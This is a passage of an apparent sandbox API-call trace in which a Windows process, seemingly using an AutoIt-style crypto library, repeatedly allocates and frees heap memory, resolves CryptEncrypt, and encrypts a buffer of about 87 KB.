dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0265.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0265.312] CharLowerBuffW (in: lpsz="byte[86984]", cchLength=0xb | out: lpsz="byte[86984]") returned 0xb [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x153c8) returned 0xe65418 [0265.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0265.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x153c2) returned 0xe7a7e8 [0265.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x153c2) returned 0xe8fbb8 [0265.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0265.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0265.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe7a7e8 | out: hHeap=0x970000) returned 1 [0265.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe8fbb8 | out: hHeap=0x970000) returned 1 [0265.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.355] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0265.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.355] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0265.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0265.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0265.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0265.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.360] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.392] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0265.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.392] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe65418*, pdwDataLen=0x8cef60*=0x153c2, dwBufLen=0x153c8 | out: pbData=0xe65418*, pdwDataLen=0x8cef60*=0x153c8) returned 1 [0265.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.398] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0265.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0265.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0265.398] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.398] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0265.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0265.398] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0265.400] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.400] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.400] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0265.400] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0265.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.400] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.401] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.411] 